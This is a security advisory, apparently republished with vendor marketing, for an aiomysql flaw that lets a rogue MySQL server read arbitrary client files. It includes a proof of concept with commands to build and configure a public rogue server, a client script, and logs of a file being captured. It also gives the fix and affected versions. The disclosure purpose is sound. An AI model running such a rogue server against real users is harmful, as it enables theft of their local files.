Summary
aiomysql allows arbitrary access to client files through vulnerability of a malicious MySQL server
The client-side settings are not checked before sending local files to MySQL server, which allows obtaining arbitrary files from the client using a rogue server.
Details
It is possible to create a rogue MySQL server that emulates authorization, ignores client flags and requests arbitrary files from the client by sending a LOAD_LOCAL instruction packet. Related to CVE-2019-2503.
PoC
First, start up a rogue MySQL server that ignores client-side flags and sends LOAD_LOCAL packet to the client, tested with https://github.com/rmb122/rogue_mysql_server
- Create a file to be stolen by the rogue server:
echo "gotcha" > /tmp/my_secret_file.txt - Clone the repo:
git clone [email protected]:rmb122/rogue_mysql_server.git && cd rogue_mysql_server - Build the server:
make rogue_mysql_server - Generate a sample config:
rogue_mysql_server -generate - In
config.yamlchangefile_listto["/tmp/my_secret_file.txt"] - Run the server:
./rogue_mysql_server -config config.yaml
Next, the vulnerability can be seen in action with the following script, which can be run in a second terminal:
import asyncio
import aiomysql
loop = asyncio.get_event_loop()
async def test_example():
conn = await aiomysql.connect(
host="127.0.0.1",
port=3306,
user="root",
password="",
db="mysql",
loop=loop,
local_infile=0, # note that we explicitly forbid local_infile
)
cursor = await conn.cursor()
await cursor.execute("SELECT 1")
print(cursor.description)
r = await cursor.fetchall()
print(r)
await cursor.close()
conn.close()
loop.run_until_complete(test_example())
The rogue server will output log messages indicating successful file read and save the contents in the loot/ directory
level=info msg="Client from addr [xxx], ID [1] try to query [select 1]"
level=info msg="Now try to read file [/tmp/my_secret_file.txt] from addr [xxx], ID [1]"
level=info msg="Read success, stored at [./loot/xxx/1757403852610__tmp_top_secret_file.txt]"
level=info msg="Client leaved, Addr [xxx], ID [1]"
Fix suggestion
Can be fixed by porting relevant changes from PyMySQL, https://github.com/PyMySQL/PyMySQL/commit/b5e17cee46e0706dbfd707cdd2024452f0fb3267
Impact
This vulnerability impacts products and environments that require connection to untrusted MySQL servers or allow the possibility for them to be compromised.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-62611? CVE-2025-62611 is a high-severity security vulnerability in aiomysql (pip), affecting versions <= 0.2.0. It is fixed in 0.3.0.
- Which versions of aiomysql are affected by CVE-2025-62611? aiomysql (pip) versions <= 0.2.0 is affected.
- Is there a fix for CVE-2025-62611? Yes. CVE-2025-62611 is fixed in 0.3.0. Upgrade to this version or later.
- Is CVE-2025-62611 exploitable, and should I be worried? Whether CVE-2025-62611 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-62611 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-62611? Upgrade
aiomysqlto 0.3.0 or later.